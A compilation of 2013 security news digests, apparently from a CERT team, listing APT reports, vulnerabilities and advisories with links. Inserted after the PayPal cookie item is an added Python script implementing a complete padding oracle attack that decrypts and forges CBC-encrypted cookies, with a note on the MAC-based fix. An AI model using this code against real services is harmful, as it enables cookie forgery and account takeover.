=======================
= End-of-Shift report =
=======================
Timeframe: Monday 02-09-2013 18:00 − Tuesday 03-09-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Blog: NetTraveler Is Back: The Red Star APT Returns With New Tricks ***
---------------------------------------------
NetTraveler, which we described in depth in a previous post, is an APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler (also known as ‘Travnet’ or “Netfile”) include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.
---------------------------------------------
http://www.securelist.com/en/blog/208214039/NetTraveler_Is_Back_The_Red_Sta…
*** 353,436 Exposed ZTE Devices Found In Net Census ***
---------------------------------------------
mask.of.sanity writes "Hundreds of thousands of internet-accessible devices manufactured by Chinese telco ZTE have been found with default or hardcoded usernames and passwords. The devices were discovered in analysis of the huge dataset from the Internet Census run this year. ZTE topped the charts, accounting for 28 percent of all affected devices worldwide. Only one manufacturer has responded to the researchers' bid to supply the data in efforts to stop production of insecure devices."
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Ev4LKChpZbQ/story01.htm
*** USB keyboard hijacks Linux kernel ***
---------------------------------------------
The memory of a Linux system can be manipulated almost arbitrarily by USB devices, as ChromeOS developer Kees Cook discovered. He supplied a patch for the problem at the same time.
---------------------------------------------
http://www.heise.de/newsticker/meldung/USB-Tastatur-kapert-Linux-Kern-19475…
*** cPanel Multiple Vulnerabilities ***
---------------------------------------------
A security issue and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information, bypass certain security restrictions, manipulate certain data, and gain escalated privileges and by malicious users to conduct script insertion attacks, bypass certain security restrictions, and compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/54601
*** Bugtraq: PayPals "invalid" aksession Padding Oracle Flaw ***
---------------------------------------------
The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery.
---------------------------------------------
http://www.securityfocus.com/archive/1/528403
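The attack the post describes, as an added example that is not part of the original Bugtraq post or of PayPal's code: the block cipher below is a stand-in 64-bit Feistel construction built from HMAC-SHA256 (an assumption; the post does not name the real cipher), the padding is assumed to be PKCS#7, and the oracle is simply the server's accept/reject decision on the cookie. Neither the cipher nor the key matters to the attack: every ciphertext block is decrypted with at most 256 oracle queries per byte, and the same oracle, run backwards, produces a forged cookie of the attacker's choosing. The sample cookie contents are constructed for the example.

```python
# Padding oracle attack on a CBC-encrypted cookie (added example; the cipher is a
# stand-in, not PayPal's). Only CBC mode, PKCS#7 padding and a padding-error oracle matter.
import hashlib
import hmac
import os

BLOCK = 8      # 64-bit block size, as reported for the aksession cookie
ROUNDS = 8

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, i: int, half: bytes) -> bytes:
    # Round function of the stand-in Feistel cipher (constructed for this example).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    # PKCS#7 check; the ValueError raised here is exactly what the oracle leaks.
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    prev = os.urandom(BLOCK)            # IV, transmitted as the first block
    out, pt = [prev], pad(plaintext)
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def make_oracle(key: bytes):
    # Server side: with no MAC, a padding failure is the only thing it can reject on.
    def oracle(cookie: bytes) -> bool:
        try:
            unpad(cbc_decrypt(key, cookie))
            return True
        except ValueError:
            return False
    return oracle

def attack_block(oracle, prev: bytes, target: bytes) -> bytes:
    # Recover D_k(target) one byte at a time, then XOR with the real previous block.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval    # force the already-known tail to padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be a longer valid pad (e.g. 02 02);
                # flipping the byte before it tells the two cases apart.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a padding byte")
    return _xor(bytes(inter), prev)

def padding_oracle_decrypt(oracle, cookie: bytes) -> bytes:
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    return unpad(b"".join(attack_block(oracle, p, c) for p, c in zip(blocks, blocks[1:])))

def padding_oracle_forge(oracle, plaintext: bytes) -> bytes:
    # Work backwards from an arbitrary last block: C[i-1] = D_k(C[i]) XOR P[i].
    pt, cur = pad(plaintext), bytes(BLOCK)
    out = [cur]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        cur = _xor(attack_block(oracle, bytes(BLOCK), cur), pt[i:i + BLOCK])
        out.append(cur)
    return b"".join(reversed(out))

def demo():
    key = os.urandom(16)                 # server secret the attacker never sees
    oracle = make_oracle(key)
    cookie = cbc_encrypt(key, b"user=alice;role=member")   # constructed sample cookie
    recovered = padding_oracle_decrypt(oracle, cookie)
    forged = padding_oracle_forge(oracle, b"user=alice;role=admin")
    return recovered, unpad(cbc_decrypt(key, forged))

if __name__ == "__main__":
    print(demo())
```

`demo()` recovers the sample cookie's plaintext and produces a forged cookie the server decrypts to `user=alice;role=admin`, having never seen the key. The last-byte probe is not optional: without it roughly one target block in 256 yields a wrong intermediate value. The fix on the server side is a MAC over the ciphertext (or an AEAD mode) verified before any decryption, which removes the oracle entirely.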
*** [remote] - Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption ***
---------------------------------------------
During an audit, the Mikrotik RouterOS sshd (ROSSSH) was found to contain a heap corruption in its sshd component that is reachable remotely before authentication.
Exploitation of this vulnerability will allow full access to the router device.
---------------------------------------------
http://www.exploit-db.com/exploits/28056
*** [webapps] - TP-Link TD-W8951ND - Multiple Vulnerabilities ***
---------------------------------------------
Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923
---------------------------------------------
http://www.exploit-db.com/exploits/28055
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 30-08-2013 18:00 − Monday 02-09-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Njw0rm - Brother From the Same Mother ***
---------------------------------------------
FireEye Labs has discovered an intriguing new sibling of the njRAT remote access tool (RAT) that one-ups its older "brother" with a couple of diabolically clever features. Created by the same author as njRAT - a freelance coder who goes by...
---------------------------------------------
http://www.fireeye.com/blog/technical/malware-research/2013/08/njw0rm-broth…
*** US Mounted 231 Offensive Cyber-operations In 2011, Runs Worldwide Botnet ***
---------------------------------------------
An anonymous reader sends this news from the Washington Post: "U.S. intelligence services carried out 231 offensive cyber-operations in 2011, the leading edge of a clandestine campaign that embraces the Internet as a theater of spying, sabotage and war, according to top-secret documents [from Edward Snowden]. Additionally, under an extensive effort code-named GENIE, U.S. computer specialists break into foreign networks so that they can be put under surreptitious U.S. control. Budget...
---------------------------------------------
http://yro.slashdot.org/story/13/08/31/2223212/us-mounted-231-offensive-cyb…
*** Boffins follow TOR breadcrumbs to identify users ***
---------------------------------------------
Anonymity? Fuggedaboutit! Watching TOR for months reveals true names. It's easier to identify TOR users than they believe, according to research published by a group of researchers from Georgetown University and the US Naval Research Laboratory (USNRL).
---------------------------------------------
http://www.theregister.co.uk/2013/09/01/tor_correlation_follows_the_breadcr…
*** Cisco IOS TCP ACK Processing Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1028969
*** Cisco ASA Idle Timeout Processing Flaw Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1028968
*** IBM WebSphere Commerce Search Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54734
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 29-08-2013 18:00 − Friday 30-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** CoreText Font Rendering Bug Leads To iOS, OS X Exploit ***
---------------------------------------------
redkemper writes with this news from BGR.com (based on a report at Hacker News), excerpting: "Android might be targeted by hackers and malware far more often than Apple's iOS platform, but that doesn't mean devices like the iPhone and iPad are immune to threats. A post on a Russian website draws attention to a fairly serious vulnerability that allows nefarious users to remotely crash apps on iOS 6, or even render them unusable. The vulnerability is seemingly due to a bug in Apple's CoreText...
---------------------------------------------
http://apple.slashdot.org/story/13/08/29/155221/coretext-font-rendering-bug…
*** Cloud service as malware entry point ***
---------------------------------------------
IT security researchers have demonstrated a method by which corporate security mechanisms can be bypassed via Dropbox and similar services.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Cloud-Dienst-als-Malware-Einfallstor…
*** Security researchers crack Dropbox ***
---------------------------------------------
Client decrypted; two-factor authentication can be circumvented
---------------------------------------------
http://derstandard.at/1376535110812
*** TeleGeographys Interactive Submarine Cable Map ***
---------------------------------------------
Ever want to know where all the submarine cables are that provide part of the physical infrastructure of the Internet? Or which cities in the world have the most connectivity via submarine cables? (or which regions might be single points of failure?) In doing some research I stumbled across this excellent site from the folks at TeleGeography ...
---------------------------------------------
http://www.submarinecablemap.com/
*** FinFisher range of attack tools ***
---------------------------------------------
FinFisher is a range of attack tools developed and sold by a company called Gamma Group. Recently, some FinFisher sales brochures and presentations were leaked on the net. They contain many interesting details about these tools. In the background part of the FinFisher presentation, they go on to explain how Gamma hired the (at-the-time) main developer of Backtrack Linux to build attack tools for Gamma. This is a reference to Martin Johannes Münch. They also boast how their developers have...
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002601.html
*** vBulletin users warned of potential exploit ***
---------------------------------------------
The forum software's developers advise users to delete the install folder
---------------------------------------------
http://www.csoonline.com/article/738959/vbulletin-users-warned-of-potential…
*** MatrikonOPC SCADA DNP3 Master Station Improper Input Validation ***
---------------------------------------------
OVERVIEW: This updated advisory was originally posted to the US-CERT secure Portal library on August 02, 2013, and is now being released to the ICS-CERT Web page. Adam Crain of Automatak and independent researcher Chris Sistrunk have identified a buffer overflow vulnerability in MatrikonOPC's SCADA DNP3 OPC Server application. MatrikonOPC has produced a patch that mitigates this vulnerability. The researchers tested the patch to validate that it resolves the vulnerability. This vulnerability...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-213-04A
*** Cisco Identity Services Engine Discloses Authentication Credentials to Remote Users ***
---------------------------------------------
http://www.securitytracker.com/id/1028965
*** IBM InfoSphere Information Server Web Console Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54698
*** Schneider Electric OFS XML External Entities Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54616
*** Cisco ASA Software TFTP Protocol Inspection Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54699
*** LibTIFF Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54628
*** VMSA-2013-0011 ***
---------------------------------------------
VMware ESXi and ESX address an NFC Protocol Unhandled Exception
---------------------------------------------
http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0011.h…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 28-08-2013 18:00 − Thursday 29-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Bugtraq: Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/528295
*** Kelihos Relying on CBL Blacklists to Evaluate New Bots ***
---------------------------------------------
The Kelihos botnet is leveraging legitimate security services such as composite blocking lists (CBLs) to test the reliability of victim IP addresses before using them to push spam and malware.
---------------------------------------------
http://threatpost.com/kelihos-relying-on-cbl-blacklists-to-evalute-new-bots…
*** Java Native Layer Exploits Going Up ***
---------------------------------------------
Recently, security researchers disclosed two Java native layer exploits (CVE-2013-2465 and CVE-2013-2471). This caused us to look into native layer exploits more closely, as they have been becoming more common this year. At this year's Pwn2Own competition at CanSecWest, Joshua Drake showed CVE-2013-1491, which was exploitable on Java 7 running on Windows 8. CVE-2013-1493 has [...]
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/--YBZ1lrFxM/
*** Cisco Secure Access Control Server EAP-FAST Authentication Flaw Lets Remote Users Execute Arbitrary Commands ***
---------------------------------------------
http://www.securitytracker.com/id/1028958
*** Unpatched Mac bug gives attackers “super user” status by going back in time ***
---------------------------------------------
Exploiting the five-month-old "sudo" flaw in OS X just got easier.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/r1T9FKbYWWY/story01…
*** Triangle MicroWorks Improper Input Validation ***
---------------------------------------------
OVERVIEW: Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in multiple Triangle MicroWorks' products and third-party components. Triangle MicroWorks has produced an update that mitigates this vulnerability. Adam Crain has tested the update to validate that it resolves the vulnerability. This vulnerability could be exploited remotely. AFFECTED PRODUCTS: The following Triangle MicroWorks products are affected:
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-240-01
*** Bugtraq: 30C3 Call for Participation ***
---------------------------------------------
http://www.securityfocus.com/archive/1/528298
*** Suspect Sendori software, (Thu, Aug 29th) ***
---------------------------------------------
Reader Kevin wrote in to alert us of an interesting discovery regarding Sendori. Kevin stated that two of his clients were treated to malware via the auto-update system for Sendori. In particular, they had grabbed Sendori-Client-Win32/2.0.15 from 54.230.5.180, which is truly an IP attributed to Sendori via lookup results. Sendori's reputation is already a bit sketchy; search results for Sendori give immediate pause, but this download in particular goes beyond the pale. With claims that "As of
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16466&rss
*** WordPress Wordfence 3.8.1 Cross Site Scripting ***
---------------------------------------------
Topic: WordPress Wordfence 3.8.1 Cross Site Scripting Risk: Low Text: # Exploit Title: Wordpress Plugin Wordfence 3.8.1 - Cross Site Scripting # Date: 28 August 2013 # Exploit Author: Dyla...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080221
*** Google Docs Information Disclosure ***
---------------------------------------------
Topic: Google Docs Information Disclosure Risk: Medium Text:I reported this problem to Google in June but I did not get the usual reply saying they were working on it, so I guess it isn...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080224
*** Bugtraq: Drupal Node View Permissions module and Flag module Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/528310
*** Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part two ***
---------------------------------------------
By Dancho Danchev The list of monetization tactics a cybercriminal can take advantage of, once they manage to hijack a huge portion of Web traffic, is virtually limitless and is entirely based on his experience within the cybercrime ecosystem. Through the utilization of blackhat SEO (search engine optimization), RFI (Remote File Inclusion), DNS cache poisoning, or […]
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/zWNtszZsWRs/
*** IBM InfoSphere Information Server Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54666
*** Office 2003s burial will resurrect hacker activity ***
---------------------------------------------
The end of Microsoft's support for the popular suite, coming in April 2014, will usher in an era of infinite zero-day attacks, an analyst predicts
---------------------------------------------
http://www.csoonline.com/article/738914/office-2003-s-burial-will-resurrect…
*** [papers] - Metasploit -The Exploit Learning Tree ***
---------------------------------------------
http://www.exploit-db.com/download_pdf/27935
*** Outage Analyzer - Track Web Service Outages,in Real Time ***
---------------------------------------------
Outage Analyzer lets you view internet service outages as they occur around the world. The application lists the outages that are occurring now or can provide a view of outages that have closed recently ...
---------------------------------------------
http://www.compuware.com/en_us/application-performance-management/products/…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 27-08-2013 18:00 − Wednesday 28-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Security Bulletin: IBM Tivoli Monitoring clients affected by vulnerabilities in IBM JRE executed under a security manager. ***
---------------------------------------------
IBM Tivoli Monitoring ships and uses a Java Runtime Environment (JRE). This alert addresses several vulnerabilities for the Tivoli Enterprise Portal browser JRE which might allow remote untrusted Java WebStart applications and untrusted Java applets to affect confidentiality, availability and integrity. CVE(s): CVE-2013-2467, CVE-2013-2448, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465, CVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Firefox Extension HTTP Nowhere Allows Users to Browse in Encrypted-Only Mode ***
---------------------------------------------
It’s no secret that the Web wasn’t really meant to be a secure platform, for communications or commerce or anything else. But it’s used for all of these functions every day, and for the most part they depend upon the sites they deal with using SSL and doing so correctly. That’s not always a sure [...]
---------------------------------------------
http://threatpost.com/firefox-extension-http-nowhere-allows-users-to-browse…
*** Microsoft Releases Revisions to 4 Existing Updates, (Tue, Aug 27th) ***
---------------------------------------------
Four patches have undergone significant revision according to Microsoft. The following patches were updated today by Microsoft, and are set to roll in the automatic updates: MS13-057 - Critical - https://technet.microsoft.com/security/bulletin/MS13-057 - Reason for Revision: V3.0 (August 27, 2013): Bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003;
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16448&rss
*** Asterisk SIP Request Processing Flaw With Invalid SDP Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1028957
*** Linux trojan analysed ***
---------------------------------------------
Avast has examined in its virus lab what is probably the first online-banking trojan targeting Linux users: the developer went to great lengths to keep his creation undetected.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Erster-Banking-Trojaner-fuer-Linux-a…
*** Exploit for unpatched hole in Java 6 surfaces ***
---------------------------------------------
A tool contains code that exploits a vulnerability in Java 6 known since June. Oracle has ended maintenance for this version, which is nonetheless still widely deployed.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Exploit-fuer-ungepatchte-Luecke-in-J…
*** Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase ***
---------------------------------------------
By Dancho Danchev We continue to observe an increase in underground market propositions for spam-ready bulletproof SMTP servers, with the cybercriminals behind them trying to differentiate their unique value proposition (UVP) in an attempt to attract more customers. Let’s profile the underground market propositions of what appears to be a novice cybercriminal offering such spam-ready […]
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/eWR3avR3M7k/
*** IBM FileNet Content Manager / Content Foundation XML Parser Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54632
*** IBM TRIRIGA Application Platform Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54641
*** Bugtraq: Two Instagram Android App Security Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/528292
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 26-08-2013 18:00 − Tuesday 27-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** [Video] ThreatVlog, Episode 1: Tor and Apple exploits revealed ***
---------------------------------------------
What is Tor? Is it really secure? What about the Apple App Store approval process? Are all these applications really looked at? In today's episode, Grayson Milbourne covers the exploitation of the Tor network through Firefox and a proof of concept showing just how insecure Apple app testing can be.
---------------------------------------------
http://blog.webroot.com/2013/08/20/tor-and-apple-exploits-revealed/
*** [Video] ThreatVlog, Episode 2: Keyloggers and your privacy ***
---------------------------------------------
Commercial and black hat keyloggers can infect any device, from your PC at home to the phone in your hand. What exactly are these programs trying to steal? How can this data be used harmfully against you? And what can you do to protect all your data and devices from this malicious data gathering? In...
---------------------------------------------
http://blog.webroot.com/2013/08/26/video-threatvlog-episode-2-keyloggers-an…
*** "thereisnofatebutwhatwemake" - Turbo-charged cracking comes to long passwords ***
---------------------------------------------
Cracking really long passwords just got a whole lot faster and easier.
---------------------------------------------
http://arstechnica.com/security/2013/08/thereisnofatebutwhatwemake-turbo-ch…
*** Feature Phone Hack Can Block Calls, Texts On Some Networks ***
---------------------------------------------
Trailrunner7 writes, quoting Threat Post "By tweaking the firmware on certain kinds of phones, a hacker could make it so other phones in the area are unable to receive incoming calls or SMS messages, according to research presented at the USENIX Security Symposium. The hack involves modifying the baseband processor on some Motorola phones and tricking some older 2G GSM networks into not delivering calls and messages. By watching the messages sent from phone towers and not delivering them
---------------------------------------------
http://it.slashdot.org/story/13/08/26/2254224/feature-phone-hack-can-block-…
*** Patch Management Guidance from NIST, (Tue, Aug 27th) ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) released a new version of its guidance on Patch Management last week, NIST SP800-40. The latest release takes a broader look at enterprise patch management than the previous version, so it is well worth the read. Patch Management is clearly called out as a "Quick Win" in Critical Control #3 "Secure Configurations for Hardware and Software". Additionally, Patch Management is something that is required by many of the cyber
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16445&rss
*** NSA: Hardening Tips For Mac OS X ***
---------------------------------------------
The National Security Agency (NSA) offers "Hardening Tips for Mac OS X", a tri-fold security brochure from the agency's Information Assurance Mission. It's packed with useful tips ... See also: http://www.nsa.gov/ia/_files/factsheets/macosx_10_6_hardeningtips.pdf
---------------------------------------------
http://www.nsa.gov/ia/_files/factsheets/macosx_hardening_tips.pdf
*** The SCADA That Cried Wolf: Who's Really Attacking Your ICS Devices- Part 2 ***
---------------------------------------------
The concern on ICS/SCADA security gained prominence due to high-profile attacks targeting these devices, most notably Flame and Stuxnet. However, we noted recent findings, which prove that the interest in ICS/SCADA devices as attack platforms is far from waning. We've all read about how insecure ICS/SCADA devices are and how certain threat actors are targeting...
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/the-scada-that-c…
*** Malware detection for medical devices ***
---------------------------------------------
US computer scientists want to detect malware in the healthcare sector via changes in the power consumption of medical devices.
---------------------------------------------
http://www.heise.de/security/meldung/Malware-Erkennung-fuer-Medizingeraete-…
*** Security Bulletin: IBM Notes & Domino fixes for multiple vulnerabilities in IBM JRE ***
---------------------------------------------
IBM Notes and Domino are vulnerable to multiple attacks listed in the Oracle Java SE Critical Patch Update Advisories (February, April and June 2013) as well as miscellaneous client-side attacks listed below. The repaired IBM JRE is available in Notes and Domino 8.5.3 Fix Pack 5 and is also planned for Notes and Domino 9.0.1. CVE(s): CVE-2013-0464, CVE-2012-3325, and CVE-2011-4858 Affected product(s) and affected version(s): IBM Notes and Domino 9.0 IBM Notes and Domino 8.5.x IBM Notes and...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Notes & Domino fixes for multiple vulnerabilities in IBM JRE ***
---------------------------------------------
IBM Notes and Domino are vulnerable to multiple attacks listed in the Oracle Java SE Critical Patch Update Advisories (February, April and June 2013) as well as miscellaneous client-side attacks listed below. The repaired IBM JRE is available in Notes and Domino 8.5.3 Fix Pack 5 and is also planned for Notes and Domino 9.0.1. CVE(s): CVE-2013-0809, CVE-2013-1493, CVE-2013-3012, CVE-2013-3011, CVE-2013-3010, CVE-2013-3009, CVE-2013-3008, CVE-2013-3007, CVE-2013-3006, CVE-2013-2455, and
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Security SiteProtector System can be affected by a vulnerability in the IBM Eclipse Help System (IEHS) (CVE-2013-0467) ***
---------------------------------------------
IBM Security SiteProtector System can be affected by a vulnerability in the IBM Eclipse Help System (IEHS). This vulnerability could allow a remote attacker to obtain the source code of the Help System. CVE(s): CVE-2013-0467 Affected product(s) and affected version(s): IBM Security SiteProtector System: 2.8.1 and 2.9 Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21647392
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Content Collector - Eclipse Help System Cross Site Scripting Vulnerability (CVE-2013-0464) ***
---------------------------------------------
A Cross-Site Scripting vulnerability exists in IBM Eclipse Help System, a component bundled with IBM Content Collector, which is used to display the IBM Content Collector help content. CVE(s): CVE-2013-0464 Affected product(s) and affected version(s): IBM Content Collector 3.0 Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21646473 X-Force Database:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** IBM Lotus iNotes Input Validation Flaws Permit Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1028954
*** Sixnet Universal Protocol Undocumented Function Codes ***
---------------------------------------------
OVERVIEW: This updated advisory is a follow-up to the original advisory titled ICSA-13-231-01 Sixnet Universal Protocol Undocumented Function Codes that was published August 19, 2013, on the ICS-CERT Web page. Independent researcher Mehdi Sabraoui has identified undocumented function codes in Sixnet's universal protocol. Sixnet has produced a new version of the remote terminal unit (RTU) firmware that mitigates this vulnerability.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-231-01A
*** RoundCube Webmail Edit Email Script Insertion Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54536
*** IBM DB2 / DB2 Connect Unspecified Security Bypass Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54644
*** Atlassian 4.x Confluence Sensitive Information Leakage ***
---------------------------------------------
Topic: Atlassian 4.x Confluence Sensitive Information Leakage Risk: Low Text:Since vendor does not seem to care about this issue more than a year after initial report (https://jira.atlassian.com/browse/C...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080213
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 23-08-2013 18:00 − Monday 26-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Mozilla and Chrome raise requirements for certificates ***
---------------------------------------------
In future, the two free browsers will no longer accept SSL certificates with an especially long validity period. The change affects only relatively few servers, however.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Mozilla-und-Chrome-erhoehen-Anforder…
*** EU breach-notification obligation takes effect ***
---------------------------------------------
Effective immediately, communications providers must report within 24 hours any data protection breach involving personal data that was unsecured or insufficiently secured. In some cases the affected individuals must also be notified.
---------------------------------------------
http://futurezone.at/netzpolitik/17910-eu-meldepflicht-bei-datenklau-tritt-…
*** RealPlayer Two Vulnerabilities ***
---------------------------------------------
1) An error when handling filenames in RMP files can be exploited to cause a stack-based buffer overflow.
2) An error when parsing RealMedia files can be exploited to cause a memory corruption.
Successful exploitation may allow execution of arbitrary code.
---------------------------------------------
https://secunia.com/advisories/54621
*** OpenSSL produces the same random numbers too often ***
---------------------------------------------
Under certain conditions the random number generator of the free crypto library returns the same numbers again within a relatively short time. It has not yet been decided whether the OpenSSL developers or OpenSSL's users have to change their code.
---------------------------------------------
http://www.heise.de/security/meldung/OpenSSL-erzeugt-zu-oft-den-gleichen-Zu…
*** IBM WebSphere Commerce Tools Pages Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54643
*** IBM Tivoli Workload Scheduler OpenSSL Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54655
*** IBM Lotus iNotes Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54645
*** Cacti Script Insertion and SQL Injection Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54531
*** Bugtraq: Wordpress post-gallery Plugin Xss vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/528243
*** [remote] - Belkin G Wireless Router Firmware 5.00.12 - RCE PoC ***
---------------------------------------------
http://www.exploit-db.com/exploits/27873
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 22-08-2013 18:00 − Friday 23-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Top Server OPC Improper Input Validation Vulnerability ***
---------------------------------------------
OVERVIEW: Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the Software Toolbox TOP Server DNP Master OPC product. Software Toolbox has produced a new version that mitigates this vulnerability. The researchers have tested the new version to validate that it resolves the vulnerability. This vulnerability could be exploited remotely. AFFECTED PRODUCTS: The following Software Toolbox products are affected:...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-234-02
*** Read of the Week: A Fuzzy Future in Malware Research, (Thu, Aug 22nd) ***
---------------------------------------------
The August 2013 ISSA Journal includes an excellent read from Ken Dunham: A Fuzzy Future in Malware Research. Ken is a SANS veteran (GCFA Gold, GREM Gold, GCIH Gold, GSEC, GCIA) who spends a good bit of his time researching, writing and presenting on malware-related topics. From Ken's abstract: "Traditional static analysis and identification measures for malware are changing, including the use of fuzzy hashes, which offer a new way to find possibly related malware samples on a computer or
---------------------------------------------
